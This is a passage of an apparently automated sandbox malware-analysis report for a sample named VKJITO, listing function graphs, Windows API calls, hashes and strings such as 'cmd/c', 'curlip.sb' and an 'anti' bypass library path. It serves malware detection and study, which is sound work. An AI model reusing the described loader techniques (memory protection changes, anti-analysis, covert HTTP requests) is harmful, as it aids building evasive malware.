7ff73a5c3993-7ff73a5c39b0 GetOverlappedResult 995->1002 1003 7ff73a5c39fa 995->1003 1006 7ff73a5c39f5-7ff73a5c39f8 997->1006 1007 7ff73a5c3af7-7ff73a5c3b0f GetLastError 997->1007 1001 7ff73a5c3a3b-7ff73a5c3a4e 998->1001 999->985 1001->992 1009 7ff73a5c3a6b-7ff73a5c3a74 call 7ff73a5c3e80 1001->1009 1010 7ff73a5c39b6-7ff73a5c39b9 1002->1010 1011 7ff73a5c3a8e-7ff73a5c3aa6 GetLastError 1002->1011 1016 7ff73a5c39fe-7ff73a5c3a11 1003->1016 1012 7ff73a5c3a61-7ff73a5c3a65 1004->1012 1013 7ff73a5c3a76-7ff73a5c3a7a 1004->1013 1006->1001 1014 7ff73a5c3b11-7ff73a5c3b14 1007->1014 1015 7ff73a5c3b16-7ff73a5c3b27 call 7ff73a5b2840 1007->1015 1008->1013 1019 7ff73a5c3a28-7ff73a5c3a2c 1008->1019 1029 7ff73a5c3ac7 1009->1029 1010->1016 1017 7ff73a5c3aa8-7ff73a5c3aab 1011->1017 1018 7ff73a5c3aad-7ff73a5c3ab6 call 7ff73a5b2840 1011->1018 1012->986 1012->1009 1013->999 1014->999 1014->1015 1015->1009 1016->994 1022 7ff73a5c3abe-7ff73a5c3ac2 call 7ff73a5c3e80 1016->1022 1017->999 1017->1018 1018->1022 1019->986 1025 7ff73a5c3a32 1019->1025 1022->1029 1025->1022 1029->999
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseCreateErrorEventHandleLast
                                          • String ID:
                                          • API String ID: 937152468-0
                                          • Opcode ID: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                          • Instruction ID: 2eea813bb104c4a94bbe4ec58e6699e58e3361fb1f7701a1b8be261c90ed6c8c
                                          • Opcode Fuzzy Hash: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                          • Instruction Fuzzy Hash: 4C81C326E08B99A9FB109B65D8813FCB760FB267A8F400571EE5C57B9CCF38D4919360
                                          Function 00007FF73A5AEFD0 Relevance: 10.5, APIs: 7, Instructions: 42memorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Fiber$SwitchVirtual$AllocConvertCreateProtectThreadmemmove
                                          • String ID:
                                          • API String ID: 2990300613-0
                                          • Opcode ID: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                          • Instruction ID: 37d95589a721e11cf64156c60b462b01bba735426a3c19e89f05b74ce7663016
                                          • Opcode Fuzzy Hash: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                          • Instruction Fuzzy Hash: 0CF0466A70901151FA18BB637E1AB2AE6816F4EFC1F80C075DD0E47B90CD3CC146D710
                                          Function 00007FF73A5C0700 Relevance: 9.2, APIs: 6, Instructions: 172fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1031 7ff73a5c0700-7ff73a5c072c call 7ff73a5caa50 1034 7ff73a5c0781-7ff73a5c0786 1031->1034 1035 7ff73a5c072e-7ff73a5c0766 call 7ff73a5c2190 1031->1035 1036 7ff73a5c0916-7ff73a5c0928 1034->1036 1039 7ff73a5c0768-7ff73a5c0774 1035->1039 1040 7ff73a5c078b-7ff73a5c078e 1035->1040 1041 7ff73a5c0776-7ff73a5c0778 1039->1041 1042 7ff73a5c0793-7ff73a5c0795 1039->1042 1040->1036 1044 7ff73a5c0797-7ff73a5c07a1 1041->1044 1045 7ff73a5c077a-7ff73a5c077f 1041->1045 1043 7ff73a5c07bf-7ff73a5c07c4 1042->1043 1042->1044 1048 7ff73a5c07c6-7ff73a5c07cb 1043->1048 1049 7ff73a5c07a7-7ff73a5c07b4 1043->1049 1046 7ff73a5c07d6-7ff73a5c07db 1044->1046 1047 7ff73a5c07a3-7ff73a5c07a5 1044->1047 1045->1046 1053 7ff73a5c07ee-7ff73a5c07f0 1046->1053 1054 7ff73a5c07dd-7ff73a5c07df 1046->1054 1047->1046 1047->1049 1048->1049 1052 7ff73a5c07cd-7ff73a5c07d2 1048->1052 1050 7ff73a5c0902-7ff73a5c0911 call 7ff73a5a72b0 1049->1050 1051 7ff73a5c07ba 1049->1051 1050->1036 1051->1036 1052->1049 1056 7ff73a5c07d4 1052->1056 1057 7ff73a5c07f2-7ff73a5c07fb 1053->1057 1059 7ff73a5c0803-7ff73a5c0814 1053->1059 1054->1057 1058 7ff73a5c07e1-7ff73a5c07ea 1054->1058 1056->1046 1060 7ff73a5c0816-7ff73a5c081b 1057->1060 1061 7ff73a5c07fd-7ff73a5c0801 1057->1061 1058->1061 1062 7ff73a5c07ec 1058->1062 1059->1060 1059->1061 1064 7ff73a5c081d-7ff73a5c0839 1060->1064 1065 7ff73a5c083b-7ff73a5c083d 1060->1065 1063 7ff73a5c0857-7ff73a5c089a CreateFileW 1061->1063 1062->1060 1068 7ff73a5c08e7-7ff73a5c0900 GetLastError 1063->1068 1069 7ff73a5c089c-7ff73a5c08a2 1063->1069 1064->1063 1066 7ff73a5c083f-7ff73a5c0841 1065->1066 1067 7ff73a5c084a-7ff73a5c084c 1065->1067 1070 7ff73a5c0852 1066->1070 1071 7ff73a5c0843-7ff73a5c0848 1066->1071 1067->1049 1067->1070 1068->1036 1068->1050 1072 7ff73a5c08a4-7ff73a5c08a9 1069->1072 1073 7ff73a5c08de-7ff73a5c08e3 1069->1073 1070->1063 1071->1063 1072->1073 1074 7ff73a5c08ab-7ff73a5c08b6 GetLastError 1072->1074 1073->1050 1075 7ff73a5c08e5 1073->1075 1074->1073 1076 7ff73a5c08b8-7ff73a5c08dc SetFileInformationByHandle 1074->1076 1075->1036 1076->1073 1077 7ff73a5c0929-7ff73a5c0946 GetLastError CloseHandle 1076->1077 1078 7ff73a5c0948-7ff73a5c0957 call 7ff73a5a72b0 1077->1078 1079 7ff73a5c095c-7ff73a5c095f 1077->1079 1078->1079 1079->1036
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                          • String ID:
                                          • API String ID: 1617036312-0
                                          • Opcode ID: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                          • Instruction ID: d75559312edb36faa3888a32d1c4c6e8090991d5045be923cd850cc05448ff2e
                                          • Opcode Fuzzy Hash: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                          • Instruction Fuzzy Hash: 17610B6BA0C25662FB75A7109506B3AABD0AF47791F8441B0DEDD03AC8DE3DD944EB30
                                          Function 00007FF73A5918B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                          • String ID: main
                                          • API String ID: 3663057573-3207122276
                                          • Opcode ID: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                          • Instruction ID: 08acc4fd6a515be3251b6a0759b2e798b60ec93d2fed0ccbb6a733b182fce5d2
                                          • Opcode Fuzzy Hash: 51943ae258cae9eb5cc6b9ba16fba8e201f35c60dc68db3363a18acbdffd4609
                                          • Instruction Fuzzy Hash: 2061913AA05B42A5FB40EB24D8823BC77B0FB4A764F8481B5D95C173A0DF3CA499D360
                                          Function 00007FF73A5A5220 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 132stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1225 7ff73a5a5220-7ff73a5adcff strlen call 7ff73a5a7a60 call 7ff73a5b8570 1231 7ff73a5add01-7ff73a5add0d call 7ff73a5acb70 1225->1231 1232 7ff73a5add12-7ff73a5add3d call 7ff73a5bbcf0 1225->1232 1239 7ff73a5add92-7ff73a5adda5 call 7ff73a5b7f90 1231->1239 1237 7ff73a5add3f-7ff73a5add43 1232->1237 1238 7ff73a5add74-7ff73a5add7e 1232->1238 1237->1238 1240 7ff73a5add45-7ff73a5add6e 1237->1240 1238->1239 1241 7ff73a5add80-7ff73a5add86 1238->1241 1246 7ff73a5adf7f-7ff73a5adfb2 call 7ff73a5dc660 1239->1246 1247 7ff73a5addab-7ff73a5ade08 call 7ff73a5bc230 call 7ff73a5b85b0 1239->1247 1240->1238 1244 7ff73a5adf64-7ff73a5adf6e 1240->1244 1241->1239 1245 7ff73a5add8d call 7ff73a5a72b0 1241->1245 1248 7ff73a5adf70-7ff73a5adf7d 1244->1248 1249 7ff73a5adf55-7ff73a5adf63 1244->1249 1245->1239 1257 7ff73a5ae038-7ff73a5ae05e 1246->1257 1261 7ff73a5adfb7-7ff73a5adfe9 call 7ff73a5dc660 1247->1261 1262 7ff73a5ade0e-7ff73a5ade5b call 7ff73a5c40e0 memmove call 7ff73a5b8590 1247->1262 1251 7ff73a5adf50 call 7ff73a5a72b0 1248->1251 1251->1249 1259 7ff73a5ae060-7ff73a5ae074 call 7ff73a5a72b0 1257->1259 1260 7ff73a5ae079-7ff73a5ae084 1257->1260 1259->1260 1261->1257 1270 7ff73a5ade61-7ff73a5adebc call 7ff73a5c41d0 * 3 call 7ff73a5bc330 1262->1270 1271 7ff73a5adfeb-7ff73a5ae003 call 7ff73a5dc330 1262->1271 1281 7ff73a5adec1-7ff73a5adec8 1270->1281 1271->1257 1282 7ff73a5ae005-7ff73a5ae033 call 7ff73a5dc660 1281->1282 1283 7ff73a5adece-7ff73a5adf23 call 7ff73a5ad920 call 7ff73a5ada60 1281->1283 1282->1257 1289 7ff73a5adf25-7ff73a5adf32 call 7ff73a5a72b0 1283->1289 1290 7ff73a5adf37-7ff73a5adf41 1283->1290 1289->1290 1290->1249 1292 7ff73a5adf43-7ff73a5adf49 1290->1292 1292->1251
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmovestrlen
                                          • String ID: cmd/ccalled `Option::unwrap()` on a `None` value$start
                                          • API String ID: 3405231851-2956442273
                                          • Opcode ID: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                          • Instruction ID: 7db78fd6fc1e891704e8552af3c4fdb2d50a4763acf6e7f551ea3c04a70aa9e1
                                          • Opcode Fuzzy Hash: aa2bc6b55a83bf6b09b9fe5ccb2b07714f5f5da40d931208fd8a12dbd3386655
                                          • Instruction Fuzzy Hash: D451E766B04BC1A8FB71AF25C8427E96321EB56798F808131DE4D4BA99DF38D389C310
                                          Function 00007FF73A5ACEB0 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 246COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1293 7ff73a5aceb0-7ff73a5acf2f call 7ff73a5c40e0 call 7ff73a5c41d0 call 7ff73a5bc3d0 1299 7ff73a5acf34-7ff73a5acf3c 1293->1299 1300 7ff73a5acf42-7ff73a5acfda call 7ff73a5acc40 call 7ff73a5a5660 call 7ff73a5ccd40 call 7ff73a5b1b10 1299->1300 1301 7ff73a5ad24f-7ff73a5ad2eb call 7ff73a5dc660 call 7ff73a5acb20 1299->1301 1314 7ff73a5acfe2-7ff73a5acfe7 call 7ff73a5ccff0 1300->1314 1315 7ff73a5acfdc-7ff73a5acfe0 1300->1315 1316 7ff73a5acfec-7ff73a5ad02d call 7ff73a5dd3d0 1314->1316 1315->1316 1320 7ff73a5ad030-7ff73a5ad052 call 7ff73a5cd550 1316->1320 1323 7ff73a5ad054-7ff73a5ad07f 1320->1323 1324 7ff73a5ad085-7ff73a5ad0d2 call 7ff73a5cd1c0 1323->1324 1325 7ff73a5ad176-7ff73a5ad197 1323->1325 1335 7ff73a5ad0d6-7ff73a5ad0f7 1324->1335 1326 7ff73a5ad1c5-7ff73a5ad1cf 1325->1326 1327 7ff73a5ad199-7ff73a5ad1a7 1325->1327 1330 7ff73a5ad1d1-7ff73a5ad1d4 1326->1330 1331 7ff73a5ad1e4-7ff73a5ad1ee 1326->1331 1327->1326 1329 7ff73a5ad1a9-7ff73a5ad1c0 call 7ff73a5a72b0 1327->1329 1329->1326 1330->1331 1334 7ff73a5ad1d6-7ff73a5ad1df call 7ff73a5a72b0 1330->1334 1336 7ff73a5ad1f0-7ff73a5ad1f9 call 7ff73a5a72b0 1331->1336 1337 7ff73a5ad1fe-7ff73a5ad208 1331->1337 1334->1331 1341 7ff73a5ad12f-7ff73a5ad148 1335->1341 1342 7ff73a5ad0f9-7ff73a5ad105 1335->1342 1336->1337 1338 7ff73a5ad20a-7ff73a5ad217 call 7ff73a5a72b0 1337->1338 1339 7ff73a5ad21c-7ff73a5ad247 1337->1339 1338->1339 1344 7ff73a5ad120-7ff73a5ad12d 1341->1344 1345 7ff73a5ad14a-7ff73a5ad15a memcmp 1341->1345 1347 7ff73a5ad248-7ff73a5ad24a 1342->1347 1348 7ff73a5ad10b-7ff73a5ad116 1342->1348 1344->1341 1344->1342 1345->1344 1349 7ff73a5ad15c 1345->1349 1350 7ff73a5ad161-7ff73a5ad172 1347->1350 1348->1335 1349->1350 1350->1327 1351 7ff73a5ad174 1350->1351 1351->1326
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$memmove
                                          • String ID: called `Result::unwrap()` on an `Err` value$curlip.sbbypass\anti\src\lib.rs
                                          • API String ID: 3228343985-4197622328
                                          • Opcode ID: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                          • Instruction ID: 7d07ae5f3f5f707fc13f65973a3f141a0b3ee99a520f0fc71c13e71d506cc813
                                          • Opcode Fuzzy Hash: 545fbd9f6fd30686cdb4edb0937e437c3d3e20a67197cde60f817635b9441185
                                          • Instruction Fuzzy Hash: 63B19326B04BC598F722AF6998023F9A360FF56798F444331DE8D2BA55EF38D245D310
                                          Function 00000266E7A40128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1365 266e7a40128-266e7a4014e HttpOpenRequestA 1366 266e7a4014f-266e7a4016b 1365->1366 1368 266e7a4030e-266e7a4032f 1366->1368 1369 266e7a40171-266e7a40174 1366->1369 1373 266e7a40331-266e7a4034e 1368->1373 1370 266e7a4017a 1369->1370 1371 266e7a40306-266e7a40307 1369->1371 1370->1366 1371->1368 1373->1371 1375 266e7a40350-266e7a40358 1373->1375 1375->1373 1376 266e7a4035a-266e7a40364 1375->1376
                                          APIs
                                          • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00000266E7A40143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Offset: 00000266E7A40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_266e7a40000_VKJITO.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: U.;
                                          • API String ID: 1984915467-4213443877
                                          • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                          • Instruction ID: a0018d66c09c339529525b117cd0d108d9c096fc9571a12c7edbdb92298c052c
                                          • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                          • Instruction Fuzzy Hash: 4C117C6034980D0BF65C94AE7C5AB3B11CAD7D8765F24816FB50EC32D9ED56CC83A029
                                          Function 00007FF73A5C3D10 Relevance: 3.1, APIs: 2, Instructions: 99fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1377 7ff73a5c3d10-7ff73a5c3d1e 1378 7ff73a5c3e65-7ff73a5c3e7f call 7ff73a5dcbd0 1377->1378 1379 7ff73a5c3d24-7ff73a5c3d32 1377->1379 1381 7ff73a5c3d34-7ff73a5c3d40 1379->1381 1382 7ff73a5c3d48-7ff73a5c3d4f 1379->1382 1386 7ff73a5c3d46 1381->1386 1387 7ff73a5c3e28-7ff73a5c3e41 call 7ff73a5dcd30 1381->1387 1383 7ff73a5c3d55-7ff73a5c3d8c ReadFile 1382->1383 1384 7ff73a5c3e47-7ff73a5c3e60 call 7ff73a5dcd30 1382->1384 1388 7ff73a5c3da9-7ff73a5c3dc4 GetLastError 1383->1388 1389 7ff73a5c3d8e 1383->1389 1386->1382 1387->1383 1387->1384 1394 7ff73a5c3dc6-7ff73a5c3dc9 1388->1394 1395 7ff73a5c3de3 1388->1395 1392 7ff73a5c3d92-7ff73a5c3d9a 1389->1392 1397 7ff73a5c3d9c-7ff73a5c3da7 1392->1397 1398 7ff73a5c3ddb 1392->1398 1399 7ff73a5c3e0e-7ff73a5c3e12 1394->1399 1400 7ff73a5c3dcb-7ff73a5c3dd9 1394->1400 1401 7ff73a5c3de8-7ff73a5c3e06 call 7ff73a5b2840 1395->1401 1402 7ff73a5c3ddf-7ff73a5c3de1 1397->1402 1398->1402 1404 7ff73a5c3e14-7ff73a5c3e1d 1399->1404 1400->1401 1406 7ff73a5c3e08-7ff73a5c3e0c 1401->1406 1407 7ff73a5c3e1e-7ff73a5c3e23 1401->1407 1402->1404 1406->1392 1406->1399 1407->1397
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                          • Instruction ID: 953a9f78ef951b7dac59de2acd2a50df50b9b9160e7c48457e16ef942975b56b
                                          • Opcode Fuzzy Hash: 5ecbb810fc304ec23de16c7c625d7a6246dba0ef6827bdf1a41db09a6f84a1ec
                                          • Instruction Fuzzy Hash: 9341AF2A708789A1FB24AF21E081339E360EB56B94F844471DA9E47788CF3DE490D730
                                          Function 00007FF73A5B85B0 Relevance: 2.6, APIs: 2, Instructions: 106COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1408 7ff73a5b85b0-7ff73a5b860e call 7ff73a5c0700 1411 7ff73a5b8610-7ff73a5b8613 1408->1411 1412 7ff73a5b8618-7ff73a5b861f 1408->1412 1413 7ff73a5b86ef-7ff73a5b8702 1411->1413 1414 7ff73a5b86e2 1412->1414 1415 7ff73a5b8625-7ff73a5b863b 1412->1415 1416 7ff73a5b86e5-7ff73a5b86e9 CloseHandle 1414->1416 1417 7ff73a5b8660-7ff73a5b8672 call 7ff73a5c0e60 1415->1417 1416->1413 1419 7ff73a5b8677-7ff73a5b867c 1417->1419 1420 7ff73a5b86a0-7ff73a5b86a7 1419->1420 1421 7ff73a5b867e-7ff73a5b868d 1419->1421 1422 7ff73a5b8703-7ff73a5b8706 1420->1422 1423 7ff73a5b86a9-7ff73a5b86af 1420->1423 1421->1420 1422->1416 1424 7ff73a5b86b1-7ff73a5b86be 1423->1424 1425 7ff73a5b8708-7ff73a5b8754 call 7ff73a5dc700 CloseHandle 1423->1425 1424->1417 1426 7ff73a5b86c0 1424->1426 1426->1414
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorHandleInformationLast
                                          • String ID:
                                          • API String ID: 3280377019-0
                                          • Opcode ID: 7ad040db04dc6190dd0f255136d4e51e97fcf344ea4e9bd994ba41734900662d
                                          • Instruction ID: 73caa5bba0475910c3ef76bd40b850bc90163157104fd12b4617f8a6b4af6744
                                          • Opcode Fuzzy Hash: 7ad040db04dc6190dd0f255136d4e51e97fcf344ea4e9bd994ba41734900662d
                                          • Instruction Fuzzy Hash: CF31C227E18755A9F711DB61A806BEDA770BB567ADF844171EE0C12B88CF3CD186D310
                                          Function 00007FF73A5B29B0 Relevance: 2.5, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00007FF73A5C3F70: CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3F9C
                                            • Part of subcall function 00007FF73A5C3F70: GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FBE
                                          • CloseHandle.KERNELBASE(?,?,00000000,?,?,00007FF73A5C3AD3), ref: 00007FF73A5B29DC
                                          • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF73A5C3AD3), ref: 00007FF73A5B29E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CancelOverlappedResult
                                          • String ID:
                                          • API String ID: 3064327366-0
                                          • Opcode ID: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                          • Instruction ID: beb8d59cb5579b461dff8c5415bdbbfa8b14640550afec505c7cd774b29d9863
                                          • Opcode Fuzzy Hash: 449e392ad8b4cab362e3c14d2863a26b2d06bc48f358e9735b842bfa8f8402b3
                                          • Instruction Fuzzy Hash: 1DE0302AB24A65A6F320A721E9015AC6730BB867B0F104772EE7D13BD88F34D4529710
                                          Function 00007FF73A5C8AA0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF73A5C8B01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                          • Instruction ID: 54a2cb011347bed7baa3987b8b159528e732b7d79443884f025d7b0ed6995dc6
                                          • Opcode Fuzzy Hash: d7e1c8bbf559339db21ccdcf0e93c2523246a71008db3d7c1647071cb9d6d139
                                          • Instruction Fuzzy Hash: 35219F76A08B8191FA219B04F54137AE360FF957D4F949230EBDD06AA8DF3CD545DB10
                                          Function 00007FF73A5B86D0 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
